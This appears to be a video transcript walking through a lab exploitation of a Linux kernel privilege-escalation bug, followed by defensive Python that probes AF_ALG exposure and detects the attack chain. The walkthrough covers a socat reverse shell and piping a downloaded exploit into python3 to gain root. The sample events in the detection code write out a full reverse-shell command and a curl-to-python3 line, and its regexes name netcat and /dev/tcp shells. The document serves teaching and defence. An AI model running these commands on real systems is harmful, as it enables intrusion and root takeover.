This exploit illustrates how a series of individually reasonable kernel changes can combine over time into a serious vulnerability. In complex systems, the interaction between components that are each "safe" on their own is often where the greatest security risk hides.
Deep Dive
Linux is HACKED? Copy Fail Exploit Works Everywhere!
Linux is hacked. What I mean by "Linux is hacked" is that every Linux distribution released after 2017 is vulnerable to a vulnerability called copy-fail, or CVE-2026-31431.
So what exactly do I mean by this copy-fail vulnerability? Let me give you a brief introduction, or a brief explanation, of this exact vulnerability.
Let's say an attacker has access to a machine and only has user privileges; he cannot execute anything with root access or root permissions. For example, he cannot install new software on the application, he cannot create new users, he cannot do any root-privileged actions or any functions that require root privileges. But using this CVE, or using the script released by copy-fail, which is only a few lines of Python code, you can execute it on the hacked machine, and this will take you from a low-privileged user to root access, where you can run any command: from executing a command that creates a user or deletes a user, to stealing a file or modifying a system file.
That's not your mistake. It's not a misconfiguration that you need to fix when you install your system, or, for example, some malicious package you installed. No, that's in the Linux kernel itself. In 2011, they added an update to the Linux kernel, AF_AESH, which is a wrapper used internally by IPsec for crypto operations. The second update was added in 2015, which is AF_ALG: socket support was added so that the kernel crypto API is exposed to user space. It lets programs talk directly to the kernel cryptographic system. And in 2017, a small in-place optimization was added to alg AEAD. Just a minor performance tweak; it seemed completely harmless. Individually, they were totally fine, nothing crazy, but all these updates together created a bomb. They are the reason that vulnerability exists today.
So if you go to copy.fail, or maybe to their GitHub repo, they've released a 732-byte Python script that allows any attacker who has access to any low-privileged user account to get root-privileged access. So with only a 732-byte Python script, any unprivileged user can run the script and get root access on the system. No race condition, no crashes, no kernel offsets needed. And now let me show you exactly how a real hacker can exploit this vulnerability in a real-world scenario, a real case that you may be facing: maybe you have an application, maybe you do a pen test from time to time, or maybe you're doing a bug bounty and you just found a CVE that gives you remote code execution on the system, but you want to get more privileges, or root access on the system, so you can prove more impact. Now let me show you how a real hacker can exploit this CVE in a real-world scenario. For example, you can see right here, we have a vulnerable lab.
So we're going to click right here.
We're going to launch this vulnerable lab, which is the latest Next.js CVE that I already have a video about on this channel. If you want to know more about that CVE, you can go ahead and watch it.
So basically we have this URL, which is a vulnerable application, which is cloud-hosted, as you can see right here.
That's just a simple vulnerable application. Let's say we found the URL, or the attacker found a victim computer, and he can get a reverse shell. For example, I'll just do something like this and we can run a command. That's CVE-2025-55182, the React2Shell CVE that I already explained on this channel. You can see we can launch this command. We can run id. We can, for example, try ls, and we can run any command we want.
But if we try whoami, you can see that we don't have root access. We are acting as a normal user, which, as you can see right here, is the lock user. That's the name of the user. Okay? And if you try, for example, adduser in a normal session where we don't have any root access, you can see it's saying that you need root access, or, for example, you need to do sudo adduser, and then we name it, for example, I don't know, a user.
So here we're going to give it sudo permission, then add the command, then name the user. But if you press enter, you can see it's requiring the password, and as an attacker, we don't have the root password of the machine.
We can only access it as a normal user. So this is when this CVE, the Linux copy-fail CVE, comes into play.
For example, just do something like this, okay? And now we need to run the script released by copy-fail. If you go to copy-fail right here, let's just run this command.
They have a simple command to run. For example, this command right here, which is curl copy-fail.sh exp, etc., which is just a Python script. We're going to copy it.
Basically, it's trying to curl the script, get it, and then execute or run this Python script. If we try to run it on a normal machine, the attacker machine, a normal one, you can see this is how it looks. For example, if we do whoami, it's going to give us root access. But that's on our machine. We want to do it on the victim machine. So that's the victim machine where we can run commands. Let's just try to add this command and press enter. You can see we are not getting anything. Basically, we don't have an interactive shell. We need a real interactive shell. We can do a reverse shell through netcat, but netcat will have the same problem: we cannot have an interactive shell with the attacked system, the hacked system. So I had to do some research, and I found we can do an interactive reverse shell using socat. You can do it with Python, you can also do it with netcat, but the best way is to do it with socat so you can run a command and see the result; for example, if we try to run tmux, we can see the result of tmux.
Okay? If you don't know anything about tmux, basically tmux allows you to open a session inside your machine that keeps running. For example, you're trying to scan for something; it's going to keep running this scan and you can get out of the machine. Maybe you have a VPS, or a hacked machine, or a vulnerable application; you can just run tmux and let the command run inside this machine, and it will not stop until you get into this tmux session and exit it. Okay? That's not our topic, just a brief explanation. So we have socat, and we need to do a reverse shell. Basically, in a reverse shell there are two steps. The first step is listening. What I mean by listening: for a reverse shell, you need a listener. Basically, it's someone on the network, maybe on some server, who is listening for somebody to connect to him. He's waiting for some connection to come into the server, for example on that IP address or on this port. He's waiting for someone to connect to him, maybe to give him a file, to send a file, or, for example, to give him a reverse shell, which is the situation right here. So we need two things. We first need to set up a reverse shell; we need to set up a listener. We're going to add this on the attacker machine. So this is our machine right here. Basically, what's going on? We are using socat and listening on port 444 using the TCP protocol. We're going to press enter. So here our machine is listening; it's waiting for somebody to connect to us. And since we have this vulnerable machine where we can run commands, we're going to try to send a connection to our machine. For example, if we copy this, right? And we can see on the victim. So that's the victim machine, right?
So we're going to click right here and launch this command. You can see I already have it, but okay, let's just try it, for example, like this.
And we're going to paste this command. But as you can see right here, we have this IP address. This is not my IP address; this is just my IP address to test. We need to change it to the hacker's IP address. It can be a public or a local IP address; it doesn't matter. But in a real-world scenario it's always going to be a public IP address, or maybe a domain name, in order to give it a connection back. So we're going to use, for example, 127.0.0.1, which is our localhost. Then we press enter. You can see it's lagging a bit; it's taking some time right here. But if you go to the hacker machine, as you can see right here, we have the session of the victim. Okay? So now we can connect.
For example, we do whoami and press enter. You can see we are the lock user. But the trick is, if we want to do, for example, adduser, you can see we need root access.
Okay? If, for example, we do sudo adduser, for example, Mark, and press enter, we can see it's asking for a password. So we need the root password of the machine. Now we press Ctrl-C again and come back. And this is when this CVE, the copy-fail CVE, comes into play. So we go back to copy-fail, copy this Python script, or this command, and run it in our reverse shell. Okay? So we click here and press enter. You can see we have this shell right here where we can run commands as the root user. If we do whoami again, you can see we are root. If we try to do adduser again, for example, Mark, and press enter, you can see it's asking for the password to create a new user, okay? So, for example, we can add a random user.
Right, so you can see Mark is added to the group. And let's try cat /etc/passwd to see if the user is created. If we come back again and do cat /etc/passwd, you can see that we have it right here: Mark. So we just created a user on the victim machine. That's not the only thing we can do; we can run whatever command we want, but this is just a proof of concept that we can execute commands as the root user. So I think that's what the CVE is about.
And also, you can go to their GitHub repo and just copy this file right here. You can copy this file and do it like this, or maybe you need to do a wget.
Okay, we can do it like this.
And I'll do exit first.
Logged out. As you can see, we just logged out from the victim machine, and we can do wget and press enter, and we have this file, this Python file. If we try to do, for example, python3 copy and press enter, you're going to see, whoami again, and you can see we have root access. So basically, this vulnerability was found by... and as you can see right here, if you scroll down, you can see it was found by XZ code right here. You can try their product, and also this vulnerability was found by AI. They're claiming they found it in only 1 hour, for a vulnerability that has existed for 7 years, and it was found in only 1 hour using XZ code AI, or whatever AI model out there, which is something very crazy, or something very concerning. And there are going to be more attacks; more CVEs are going to come out in the next few days or months, because now we have these AI-powered agents that can do hacking for us, or do code review for us. So basically, more vulnerabilities will be discovered in the next few months or years, which is something that is very concerning, and it's very good for white-hat hackers, because if there are more attack scenarios, there are more attack surfaces; of course, these companies or organizations are going to be targeted by hackers, and they need white-hat hackers to secure them. At least that's what I think for now, and I think that's it for this video. Thank you so much for watching this video. If you want to learn more about ethical hacking, bug bounty, or pen testing, I already have a bug bounty course and a pen testing course in the description. You can go to hackers.space. You can pick the best program for you, and there is an interactive chat where you can connect with other hackers.
You can learn more about how you can use AI in hacking, etc., and a lot of other vulnerability types. So thank you so much for watching this video, and don't forget, if you have any questions or any misunderstanding, you can type them in the comment section. I reply to all the comments, and don't forget to click the like button and the subscribe button, and see you in the next one.
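The video attributes the bug to the combination of AF_ALG (the kernel crypto API exposed to user space) and the AEAD socket path. Whether that interface is reachable from an unprivileged process on a given host is something a defender can check directly. The following Python is an added example, not part of the video, the lab, or copy.fail's code: it only probes whether an AF_ALG socket can be created and bound to an AEAD algorithm as the current user, and lists AEAD algorithms from /proc/crypto-style text. It does not attempt the exploit. Reachability of AF_ALG does not by itself prove the host is vulnerable (that depends on the kernel version and patch state), and blocking it is not the vendor fix; it is an attack-surface check. The algorithm name gcm(aes) and the embedded /proc/crypto excerpt are constructed assumptions.

```python
import errno
import os
import platform
import socket

# Constructed excerpt in the layout of /proc/crypto (not captured from a real host):
# blank-line separated "key : value" blocks, one per registered algorithm.
SAMPLE_PROC_CRYPTO = """\
name         : gcm(aes)
driver       : generic-gcm-aes
module       : kernel
priority     : 100
type         : aead
async        : no
ivsize       : 12
maxauthsize  : 16

name         : sha256
driver       : sha256-generic
module       : kernel
priority     : 100
type         : shash
blocksize    : 64
digestsize   : 32
"""


def parse_proc_crypto(text):
    """Parse /proc/crypto-style text into one dict per registered algorithm."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def aead_algorithms(text):
    """Names of algorithms registered with type 'aead', i.e. the kind that the
    AF_ALG 'aead' socket type can instantiate for a user-space caller."""
    return sorted({e["name"] for e in parse_proc_crypto(text) if e.get("type") == "aead"})


def probe_af_alg(alg_type="aead", alg_name="gcm(aes)"):
    """Try, as the current (ideally unprivileged) user, to open an AF_ALG socket
    and bind it to the given algorithm. Returns a dict instead of raising so the
    outcome can be logged or asserted on. Linux-only: elsewhere socket.AF_ALG
    does not exist and the probe simply reports that."""
    result = {
        "platform": platform.system(),
        "kernel": platform.release(),
        "uid": os.getuid() if hasattr(os, "getuid") else None,
        "af_alg_supported": hasattr(socket, "AF_ALG"),
        "bound": False,
        "error": None,
    }
    if not result["af_alg_supported"]:
        return result
    try:
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    except OSError as exc:  # e.g. EAFNOSUPPORT: family compiled out or filtered (seccomp, sandbox)
        result["error"] = errno.errorcode.get(exc.errno, repr(exc))
        return result
    try:
        # A successful bind means the kernel instantiated the algorithm on our behalf,
        # so the crypto API socket surface is reachable from this uid.
        sock.bind((alg_type, alg_name))
        result["bound"] = True
    except OSError as exc:  # ENOENT: no such algorithm; EPERM/EACCES: blocked by policy
        result["error"] = errno.errorcode.get(exc.errno, repr(exc))
    finally:
        sock.close()
    return result


def summarize(result):
    """One-line verdict about exposure of the interface, not about exploitability."""
    if not result["af_alg_supported"]:
        return "AF_ALG not available on this platform"
    if result["bound"]:
        return "AF_ALG aead socket reachable as uid %s: kernel crypto API surface exposed" % result["uid"]
    return "AF_ALG aead socket not bindable (%s)" % result["error"]


if __name__ == "__main__":
    print("aead algorithms in sample:", aead_algorithms(SAMPLE_PROC_CRYPTO))
    outcome = probe_af_alg()
    print(outcome)
    print(summarize(outcome))
```

Run it as the same low-privileged account the web application uses; on a real host, replace the embedded sample with the contents of /proc/crypto to see which AEAD algorithms are actually registered. A "reachable" verdict means the interface the video describes is open to that account and the kernel version should be checked against the fix; a "not bindable" verdict with EAFNOSUPPORT or EPERM means the surface is closed off by configuration or policy.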
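The chain walked through in the video (a socat reverse shell from the web-app user, a failed sudo, a script fetched with curl and piped into python3, and then commands running as root without going through sudo or su) leaves a recognisable trail in process-start telemetry. The following Python is an added example, not code from the video, the lab, or copy.fail: it runs three rules over a constructed set of process events modelled on that chain and ties each unexplained root process back to the most recent fetch-and-execute by the same login uid. The event fields (`auid` for the audit login uid, `euid`, parent process name, command line), the web-app user name `node`, the attacker address 203.0.113.10, the port 444 from the video, and the URL are all assumptions.

```python
import re

# Constructed process-start events (not a real capture) modelled on the video:
# the web-app user "node" (assumed) spawns a socat reverse shell, tries sudo and
# fails, pipes a downloaded script into python3, and from then on runs commands
# with euid 0 whose parent is neither sudo nor su.
SAMPLE_EVENTS = [
    {"ts": "10:00:01", "auid": "node", "euid": 1000, "parent": "node", "cmd": "ls -la /app"},
    {"ts": "10:00:05", "auid": "node", "euid": 1000, "parent": "sh",
     "cmd": "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:203.0.113.10:444"},
    # sudo is setuid root, so the sudo process itself shows euid 0; it must not be flagged.
    {"ts": "10:00:40", "auid": "node", "euid": 0, "parent": "bash", "cmd": "sudo adduser mark"},
    {"ts": "10:01:02", "auid": "node", "euid": 1000, "parent": "bash",
     "cmd": "curl -fsSL https://example.invalid/exp.py | python3"},
    {"ts": "10:01:09", "auid": "node", "euid": 0, "parent": "python3", "cmd": "/bin/sh -i"},
    {"ts": "10:01:20", "auid": "node", "euid": 0, "parent": "sh", "cmd": "adduser mark"},
    {"ts": "10:02:00", "auid": "admin", "euid": 0, "parent": "sudo", "cmd": "apt-get update"},
]

REVERSE_SHELL = re.compile(
    r"\bsocat\b.*\btcp[46]?(?:-connect)?:"   # socat ... tcp:HOST:PORT, the form used on the victim
    r"|\b(?:nc|ncat|netcat)\b.*\s-[ec]\s"     # nc -e /bin/sh HOST PORT
    r"|/dev/tcp/"                             # bash -i >& /dev/tcp/HOST/PORT
    r"|pty\.spawn"                            # python pty-based reverse shells
)
# Download piped or chained straight into an interpreter ("curl ... | python3").
FETCH_EXEC = re.compile(r"\b(?:curl|wget)\b.*(?:\||&&|;)\s*(?:python3?|sh|bash|perl)\b")

# Parents that legitimately hand out a root process (assumed baseline for this host).
ROOT_PARENTS_OK = {"sudo", "su", "systemd", "cron", "sshd", "init"}
# Commands that are themselves the sanctioned privilege boundary.
PRIV_TOOLS = {"sudo", "su", "doas", "pkexec"}


def _argv0(cmd):
    """Basename of the executed program, or '' for an empty command line."""
    parts = cmd.split()
    return parts[0].rsplit("/", 1)[-1] if parts else ""


def unexplained_root(event):
    """True when a non-root login uid is running with euid 0 and neither the
    parent nor the command itself is a sanctioned privilege-raising tool."""
    if event["euid"] != 0 or event["auid"] == "root":
        return False
    if event["parent"] in ROOT_PARENTS_OK:
        return False
    return _argv0(event["cmd"]) not in PRIV_TOOLS


def analyze(events):
    """Return findings in event order. Each unexplained_root finding carries the
    last fetch_and_execute command seen for the same login uid as likely_vector."""
    findings, last_fetch = [], {}
    for e in events:
        cmd = e["cmd"]
        if REVERSE_SHELL.search(cmd):
            findings.append({"ts": e["ts"], "rule": "reverse_shell", "cmd": cmd})
        if FETCH_EXEC.search(cmd):
            last_fetch[e["auid"]] = cmd
            findings.append({"ts": e["ts"], "rule": "fetch_and_execute", "cmd": cmd})
        if unexplained_root(e):
            findings.append({"ts": e["ts"], "rule": "unexplained_root", "cmd": cmd,
                             "likely_vector": last_fetch.get(e["auid"])})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["ts"], f["rule"].ljust(18), f["cmd"], f.get("likely_vector", ""))
```

The unexplained_root rule is the one that matters for this class of bug: the privilege escalation itself makes no sudo or su call, so the only thing a log shows is a process that a low-privileged login uid is suddenly running as euid 0. The parent and tool whitelists are a starting baseline and will need tuning per host (setuid helpers, container runtimes).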